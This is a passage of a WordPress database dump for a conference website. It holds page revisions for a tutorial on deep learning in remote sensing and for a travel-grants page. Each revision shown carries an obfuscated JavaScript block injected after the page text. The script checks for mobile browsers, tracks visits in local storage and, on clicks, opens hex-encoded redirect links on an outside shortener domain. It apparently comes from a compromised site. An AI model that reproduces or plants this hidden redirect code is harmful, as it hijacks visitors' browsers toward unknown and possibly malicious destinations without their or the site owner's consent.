_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-02-05 09:43:06','2023-02-05 09:43:06','',2665,'https://gsw2023.com/?p=3795',0,'revision','',0),
(3796,1,'2023-02-05 09:48:33','2023-02-05 09:48:33','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Henry Leung</h6>\n<h6>Professor, Electrical and Software Engineering</h6>\n<h6>University of Calgary, Canada</h6>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"72\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Topic</h5>\n<h5 style=\"text-align: justify;\"><strong>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span></p>\n<p>Henry Leung is a professor of the Department of Electrical and Computer Engineering of the University of Calgary. Before joining U of C, he was with the Department of National Defence (DND) of Canada as a defence scientist. His main duty there was to conduct research and development of automated surveillance systems, which can perform detection, tracking, identification and data fusion automatically as a decision aid for military operators. His current research interests include big data analytic,   chaos and nonlinear dynamics, information fusion, machine learning, signal and image processing, robotics and internet of things. He has published extensively in the open literature on these topics. He has over 350 journal papers and 250 refereed conference papers.  He is currently associate editor of Scietific Reports, IEEE Journal on Emerging and Special Topics on Circuits and Systems, Sensor Journal, IEICE Trans. Nonlinear Theory and its Applications, and Aerospace Systems He is the editor of the Springer book series on “Information Fusion and Data Science”. He is a Fellow of IEEE and SPIE.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-05 09:48:33','2023-02-05 09:48:33','',3709,'https://gsw2023.com/?p=3796',0,'revision','',0),
(3797,1,'2023-02-05 10:01:45','2023-02-05 10:01:45','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Henry Leung</h6>\n<h6>Professor, Electrical and Software Engineering</h6>\n<h6>University of Calgary, Canada</h6>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"72\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Topic</h5>\n<h5 style=\"text-align: justify;\"><strong>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span></p>\n<p style=\"text-align: justify;\">Henry Leung is a professor of the Department of Electrical and Computer Engineering of the University of Calgary. Before joining U of C, he was with the Department of National Defence (DND) of Canada as a defence scientist. His main duty there was to conduct research and development of automated surveillance systems, which can perform detection, tracking, identification and data fusion automatically as a decision aid for military operators. His current research interests include big data analytic,   chaos and nonlinear dynamics, information fusion, machine learning, signal and image processing, robotics and internet of things. He has published extensively in the open literature on these topics. He has over 350 journal papers and 250 refereed conference papers.  He is currently associate editor of Scietific Reports, IEEE Journal on Emerging and Special Topics on Circuits and Systems, Sensor Journal, IEICE Trans. Nonlinear Theory and its Applications, and Aerospace Systems He is the editor of the Springer book series on “Information Fusion and Data Science”. He is a Fellow of IEEE and SPIE.</p>\n<p>&nbsp;[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-05 10:01:45','2023-02-05 10:01:45','',3709,'https://gsw2023.com/?p=3797',0,'revision','',0),
